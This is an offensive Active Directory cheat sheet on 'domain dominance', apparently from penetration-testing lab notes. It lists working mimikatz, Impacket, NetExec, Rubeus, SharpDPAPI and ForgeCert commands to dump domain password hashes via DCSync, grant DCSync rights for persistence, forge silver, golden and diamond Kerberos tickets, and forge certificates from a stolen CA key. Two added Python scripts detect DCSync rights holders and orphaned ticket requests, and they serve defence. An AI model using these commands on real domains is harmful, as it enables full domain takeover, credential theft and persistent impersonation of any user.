Domain Dominance

1. DCSync

! This requires GetNCChanges which is usually only available to domain admins

DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.

The DCSync permission implies having these permissions over the domain itself: DS-Replication-Get-Changes, Replicating Directory Changes All and Replicating Directory Changes In Filtered Set.

By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges.

We can check who has these permissions using PowerView.

- DCSync w/ Mimikatz

To DCSync only one user

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:{domain} /user:krbtgt"

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:{domain} /user:administrator /csv" "exit"

To DCSync all users of the domain

.\mimikatz "lsadump::dcsync /domain:{domain} /all /csv" "exit"

- DCSync w/ Secretsdump from Impacket

impacket-secretsdump {Domain_Name}/{Username}:{Password}@{IP}

impacket-secretsdump {Domain_Name}/{Username}@{IP} -hashes ':{NTLMHash}'

- DCSync w/ NetExec (formerly Crackmapexec)

netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds

netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds --users

netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds --users --enabled

netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds vss

- Persistence

If you are a domain admin, you can grant these permissions to any user with the help of PowerView:

Add-ObjectAcl -TargetDistinguishedName "dc=example,dc=domain,dc=com" -PrincipalSamAccountName username -Rights DCSync -Verbose

To check

Get-ObjectAcl -DistinguishedName "dc=example,dc=domain,dc=com" -ResolveGUIDs | ?{$_.IdentityReference -match "username"}
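The same check from the defender's side, as an added example that is not part of the original notes: it walks ACE records from the domain root and lists principals outside the default groups that hold the replication rights. The record field names, the sample principals and the allow-list handling are assumptions made for illustration.

```python
# Added example: flag non-default principals holding DCSync rights on the domain root.
# Extended-right GUIDs for the three replication rights named above.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
NEEDED = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
ANY_RIGHT = "00000000-0000-0000-0000-000000000000"  # ACE not scoped to a single right
# Default holders as listed on this page; extend for your environment.
DEFAULT_HOLDERS = {"domain admins", "enterprise admins", "administrators", "domain controllers"}
GC = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GCA = "1131F6AD-9C07-11D1-F79F-00C04FC2DCD2"  # upper case on purpose: GUID case varies

# Constructed sample ACEs (field names are assumptions, not a real export format).
SAMPLE_ACES = [
    {"identity": "EXAMPLE\\Domain Admins", "rights": "GenericAll", "object_type": ANY_RIGHT, "type": "Allow"},
    {"identity": "EXAMPLE\\username", "rights": "ExtendedRight", "object_type": GC, "type": "Allow"},
    {"identity": "EXAMPLE\\username", "rights": "ExtendedRight", "object_type": GCA, "type": "Allow"},
    {"identity": "EXAMPLE\\sync-svc", "rights": "ExtendedRight", "object_type": GC, "type": "Allow"},
    {"identity": "EXAMPLE\\backup-op", "rights": "ReadProperty, ExtendedRight", "object_type": ANY_RIGHT, "type": "Allow"},
    {"identity": "EXAMPLE\\auditor", "rights": "ReadProperty", "object_type": ANY_RIGHT, "type": "Allow"},
]

def replication_rights(aces):
    """Return {principal: set of replication rights granted by Allow ACEs}."""
    granted = {}
    for ace in aces:
        if ace["type"] != "Allow":
            continue  # simplification: Deny ACEs are not evaluated
        rights = {r.strip() for r in ace["rights"].split(",")}
        guid = ace["object_type"].lower()
        if "GenericAll" in rights or ("ExtendedRight" in rights and guid == ANY_RIGHT):
            names = set(REPL_RIGHTS.values())  # unscoped grant covers every extended right
        elif "ExtendedRight" in rights and guid in REPL_RIGHTS:
            names = {REPL_RIGHTS[guid]}
        else:
            continue
        granted.setdefault(ace["identity"], set()).update(names)
    return granted

def unexpected_dcsync_holders(aces, allowed=DEFAULT_HOLDERS):
    """Principals outside the allow-list that hold both rights needed to pull password data."""
    return sorted(
        who for who, names in replication_rights(aces).items()
        if NEEDED <= names and who.split("\\")[-1].lower() not in allowed
    )

if __name__ == "__main__":
    print(unexpected_dcsync_holders(SAMPLE_ACES))
```

Group membership is not expanded here, so a flagged group still needs its members resolved before deciding whether the grant is legitimate.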

2. Silver Tickets

In a silver ticket attack, the attacker creates a forged Kerberos ticket, which they can then use to authenticate themselves as a user and access the resources and systems that the user is authorized to access. You may forge a TGS for any user to any service on that machine, which is useful for short/medium-term persistence.

Technique | Required Service Tickets
psexec | CIFS
winrm | HOST & HTTP
dcsync (DCs only) | LDAP

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:{service, for example: cifs/{machine}.{domain}} /aes256:{dumped aes256} /user:{target user} /domain:{domain name} /sid:{SID (whoami)} /nowrap

Then import the ticket (PtT).

3. Golden Tickets

A "golden ticket" is a forged TGT, signed by the domain's krbtgt account. Where a silver ticket can be used to impersonate any user, it's limited to either that single service or to any service but on a single machine. A golden ticket can be used to impersonate any user, to any service, on any machine in the domain. The krbtgt account's credentials are never changed automatically. For that reason, the krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently).

- With Mimikatz

privilege::debug

lsadump::lsa /inject /name:krbtgt

lsadump::lsa /patch

lsadump::trust /patch

lsadump::dcsync /user:krbtgt

Then we need to take the krbtgt hash, locate the domain SID (PowerView) and restart mimikatz:

privilege::debug

kerberos::purge

kerberos::golden /user:fakeuser /domain:{domain name} /sid:{domain SID} /rc4:{krbtgt hash} /ptt

Alternatively we can use ticketer.

Then to use the ticket in Linux:

misc::convert ccache ticket.kirbi

export KRB5CCNAME=/home/user/ticket.ccache

cat $KRB5CCNAME

Then to connect:

./psexec.py -k -no-pass -dc-ip {ip} {domain}/administrator@{ip}

To swap ticket between Windows and Linux:

ticket_converter.py velociraptor.ccache velociraptor.kirbi

ticket_converter.py velociraptor.kirbi velociraptor.ccache

- With Rubeus

Once we have the krbtgt hash (for example from a DCSync), locate the domain SID with PowerView and run:

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:{krbtgt aes256 hash} /user:{target user} /domain:{domain} /sid:{domain SID} /nowrap

Then we can PtT.

4. Diamond Tickets

Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don't track the TGTs they have legitimately issued, they will happily accept TGTs that are encrypted with their own krbtgt hash.

Therefore, a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ. A "diamond ticket" is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain's krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQs will have a preceding AS-REQ.
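The detection idea described above (TGS-REQs with no corresponding AS-REQ), sketched as an added example that is not part of the original notes: it correlates Windows Security events 4768 (TGT requested) and 4769 (service ticket requested) per account and client address. The event field names, the sample events and the 10-hour lifetime are assumptions made for illustration.

```python
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)  # assumed Kerberos policy value; set to the domain's

def _t(stamp):
    return datetime.strptime(stamp, "%Y-%m-%d %H:%M")

# Constructed sample events; field names are assumptions, not a real export format.
# 4768 = TGT requested (AS-REQ), 4769 = service ticket requested (TGS-REQ).
SAMPLE_EVENTS = [
    {"time": _t("2024-05-01 08:00"), "event_id": 4768, "account": "carol", "client_ip": "10.0.0.40"},
    {"time": _t("2024-05-02 09:00"), "event_id": 4768, "account": "alice", "client_ip": "10.0.0.21"},
    {"time": _t("2024-05-02 09:01"), "event_id": 4769, "account": "alice@EXAMPLE.LOCAL",
     "client_ip": "10.0.0.21", "service": "cifs/fs01"},
    {"time": _t("2024-05-02 09:30"), "event_id": 4769, "account": "fakeuser@EXAMPLE.LOCAL",
     "client_ip": "10.0.0.50", "service": "cifs/dc01"},
    {"time": _t("2024-05-02 09:45"), "event_id": 4769, "account": "carol@EXAMPLE.LOCAL",
     "client_ip": "10.0.0.40", "service": "ldap/dc01"},
]

def norm(account):
    """4769 logs user@REALM while 4768 logs the bare name; compare on the bare name."""
    return account.split("@")[0].lower()

def orphan_tgs_requests(events, lifetime=TGT_LIFETIME):
    """Return 4769 events with no 4768 for the same account and client within `lifetime`."""
    last_as_req = {}
    orphans = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (norm(ev["account"]), ev["client_ip"])
        if ev["event_id"] == 4768:
            last_as_req[key] = ev["time"]
        elif ev["event_id"] == 4769:
            seen = last_as_req.get(key)
            # No AS-REQ at all, or the only one is older than any valid TGT could be.
            if seen is None or ev["time"] - seen > lifetime:
                orphans.append(ev)
    return orphans

if __name__ == "__main__":
    for ev in orphan_tgs_requests(SAMPLE_EVENTS):
        print(ev["time"], norm(ev["account"]), ev["client_ip"], ev["service"])
```

Feed it events collected from every domain controller; a TGT issued by one DC and presented to another otherwise shows up as a false orphan.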

First, we prove we have no access to the DC. Example:

ls \\dc-2.dev.cyberbotic.io\c$

Then, we create it with Rubeus (To locate the RID go to PowerView):

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:{username of the user to impersonate (domain admin)} /ticketuserid:{domain RID of that user} /groups:512 /krbkey:{krbtgt AES256 hash} /nowrap

Rubeus describe will now show that this is a TGT for the target user:

C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket:{ticket}

Then with that ticket we can PtT.

5. Forged Certificates

Gaining local admin access to a CA allows an attacker to extract the CA private key, which can be used to sign a forged certificate. The default validity period for a CA private key is 5 years, but this can be set to any value during setup, sometimes as high as 10+ years.

Once on a CA, SharpDPAPI (https://github.com/GhostPack/SharpDPAPI) can extract the private keys:

execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machine

Then we need to save the private key and certificate to a .pem file and convert it to a .pfx with openssl (Procedure in Certificate Services/Misconfigured Certificate Templates).

Then, build the forged certificate with ForgeCert (https://github.com/GhostPack/ForgeCert). Example:

C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123

Even though you can specify any SubjectAltName, the user does need to be present in AD. We can now use Rubeus to request a legitimate TGT with this forged certificate:

execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap

Then we can do PtT. We can combine this with the S4U2self trick to gain access to any machine or service in the domain.
